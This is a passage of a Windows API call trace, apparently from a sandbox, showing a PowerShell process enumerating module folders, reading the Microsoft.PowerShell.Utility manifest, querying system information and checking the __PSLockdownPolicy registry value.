returned 0x4e [0114.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c4) returned 1 [0114.414] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea88 | out: lpFileInformation=0x5a0ea88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x497da680, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x497da680, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0114.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c0) returned 1 [0114.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0114.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x41, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", lpFilePart=0x0) returned 0x40 [0114.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c4) returned 1 [0114.416] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea88 | out: lpFileInformation=0x5a0ea88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8100bf6e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8100bf6e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0114.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c0) returned 1 [0114.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0114.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x42, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", lpFilePart=0x0) returned 0x41 [0114.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c4) returned 1 [0114.417] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psscheduledjob"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea88 | out: lpFileInformation=0x5a0ea88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0114.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c0) returned 1 [0114.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x47 [0114.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x47, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", lpFilePart=0x0) returned 0x46 [0114.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c4) returned 1 [0114.418] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea88 | out: lpFileInformation=0x5a0ea88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0114.419] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c0) returned 1 [0114.419] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0ea74) returned 1 [0114.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0114.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0114.420] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\*"), lpFindFileData=0x5a0e824 | out: lpFindFileData=0x5a0e824*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e320 [0114.420] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.420] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psd1", cAlternateFileName="")) returned 1 [0114.420] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e285ac0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e285ac0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 1 [0114.420] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e285ac0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e285ac0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 0 [0114.420] FindClose (in: hFindFile=0x68e320 | out: hFindFile=0x68e320) returned 1 [0114.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7e4) returned 1 [0114.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0ea44) returned 1 [0114.421] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0114.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0114.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0114.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0114.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0114.422] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7ec) returned 1 [0114.422] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x2b51644 | out: lpFileInformation=0x2b51644*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982)) returned 1 [0114.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7e8) returned 1 [0114.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0114.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0114.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e954) returned 1 [0114.423] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d0 [0114.423] GetFileType (hFile=0x3d0) returned 0x1 [0114.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e950) returned 1 [0114.423] GetFileType (hFile=0x3d0) returned 0x1 [0114.424] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e990*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e990*=0) returned 0x0 [0114.425] ReadFile (in: hFile=0x3d0, lpBuffer=0x2b52474, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e9bc, lpOverlapped=0x0 | out: lpBuffer=0x2b52474*, lpNumberOfBytesRead=0x5a0e9bc*=0x982, lpOverlapped=0x0) returned 1 [0114.428] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e990*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e990*=0) returned 0x982 [0114.428] ReadFile (in: hFile=0x3d0, lpBuffer=0x2b5198a, nNumberOfBytesToRead=0x27e, lpNumberOfBytesRead=0x5a0e9bc, lpOverlapped=0x0 | out: lpBuffer=0x2b5198a*, lpNumberOfBytesRead=0x5a0e9bc*=0x0, lpOverlapped=0x0) returned 1 [0114.428] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e990*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e990*=0) returned 0x982 [0114.429] ReadFile (in: hFile=0x3d0, lpBuffer=0x2b52474, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e9bc, lpOverlapped=0x0 | out: lpBuffer=0x2b52474*, lpNumberOfBytesRead=0x5a0e9bc*=0x0, lpOverlapped=0x0) returned 1 [0114.429] CloseHandle (hObject=0x3d0) returned 1 [0114.432] CoCreateGuid (in: pguid=0x5a0eabc | out: pguid=0x5a0eabc*(Data1=0xed83fdce, Data2=0xcfad, Data3=0x40cc, Data4=([0]=0x8d, [1]=0x94, [2]=0x39, [3]=0x48, [4]=0xf5, [5]=0x7c, [6]=0xfb, [7]=0x6))) returned 0x0 [0114.433] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3d0 [0114.433] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x408 [0114.434] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c [0114.434] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x40c [0114.434] SetEvent (hEvent=0x40c) returned 1 [0114.434] SetEvent (hEvent=0x3d0) returned 1 [0114.434] SetEvent (hEvent=0x408) returned 1 [0114.434] SetEvent (hEvent=0x36c) returned 1 [0114.434] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x410 [0114.435] SetThreadUILanguage (LangId=0x0) returned 0x409 [0114.507] EtwEventActivityIdControl () returned 0x0 [0114.507] EtwEventActivityIdControl () returned 0x0 [0114.507] EtwEventActivityIdControl () returned 0x0 [0114.527] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0114.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0114.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0114.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2e8) returned 1 [0114.529] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0e5ac | out: lpFileInformation=0x5a0e5ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982)) returned 1 [0114.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2e4) returned 1 [0114.529] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0114.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0114.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0114.529] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x5a0e1f0, Length=0x20, ResultLength=0x5a0e260 | out: SystemInformation=0x5a0e1f0, ResultLength=0x5a0e260*=0x0) returned 0xc0000003 [0114.530] GetSystemInfo (in: lpSystemInfo=0x5a0e26c | out: lpSystemInfo=0x5a0e26c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0114.530] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0e1fc | out: phkResult=0x5a0e1fc*=0x414) returned 0x0 [0114.531] RegQueryValueExW (in: hKey=0x414, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x5a0e218, lpData=0x0, lpcbData=0x5a0e214*=0x0 | out: lpType=0x5a0e218*=0x0, lpData=0x0, lpcbData=0x5a0e214*=0x0) returned 0x2 [0114.531] RegCloseKey (hKey=0x414) returned 0x0 [0114.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0114.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0114.531] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e174) returned 1 [0114.532] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x414 [0114.532] GetFileType (hFile=0x414) returned 0x1 [0114.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e170) returned 1 [0114.532] GetFileType (hFile=0x414) returned 0x1 [0114.536] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e1b0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e1b0*=0) returned 0x0 [0114.537] ReadFile (in: hFile=0x414, lpBuffer=0x2b85f98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e1dc, lpOverlapped=0x0 | out: lpBuffer=0x2b85f98*, lpNumberOfBytesRead=0x5a0e1dc*=0x982, lpOverlapped=0x0) returned 1 [0114.537] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e1b0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e1b0*=0) returned 0x982 [0114.537] ReadFile (in: hFile=0x414, lpBuffer=0x2b854ae, nNumberOfBytesToRead=0x27e, lpNumberOfBytesRead=0x5a0e1dc, lpOverlapped=0x0 | out: lpBuffer=0x2b854ae*, lpNumberOfBytesRead=0x5a0e1dc*=0x0, lpOverlapped=0x0) returned 1 [0114.537] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e1b0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e1b0*=0) returned 0x982 [0114.538] ReadFile (in: hFile=0x414, lpBuffer=0x2b85f98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e1dc, lpOverlapped=0x0 | out: lpBuffer=0x2b85f98*, lpNumberOfBytesRead=0x5a0e1dc*=0x0, lpOverlapped=0x0) returned 1 [0114.538] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x5a0e144, Length=0x20, ResultLength=0x5a0e1b4 | out: SystemInformation=0x5a0e144, ResultLength=0x5a0e1b4*=0x0) returned 0xc0000003 [0114.538] GetSystemInfo (in: lpSystemInfo=0x5a0e1c0 | out: lpSystemInfo=0x5a0e1c0*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0114.539] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0e150 | out: phkResult=0x5a0e150*=0x418) returned 0x0 [0114.539] RegQueryValueExW (in: hKey=0x418, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x5a0e16c, lpData=0x0, lpcbData=0x5a0e168*=0x0 | out: lpType=0x5a0e16c*=0x0, lpData=0x0, lpcbData=0x5a0e168*=0x0) returned 0x2 [0114.539] RegCloseKey (hKey=0x418) returned 0x0 [0114.539] CloseHandle (hObject=0x414) returned 1 [0114.542] CoCreateGuid (in: pguid=0x5a0e240 | out: pguid=0x5a0e240*(Data1=0x9ae0fa3b, Data2=0xe434, Data3=0x424a, Data4=([0]=0x98, [1]=0xec, [2]=0x1e, [3]=0x5d, [4]=0xa2, [5]=0x0, [6]=0x9c, [7]=0xc8))) returned 0x0 [0114.542] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0dfa0 | out: lpPerformanceCount=0x5a0dfa0*=2939935299914) returned 1 [0114.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0114.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0114.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0dc8c) returned 1 [0114.543] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0df50 | out: lpFileInformation=0x5a0df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982)) returned 1 [0114.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0dc88) returned 1 [0114.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0114.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0114.543] GetFullPathNameW 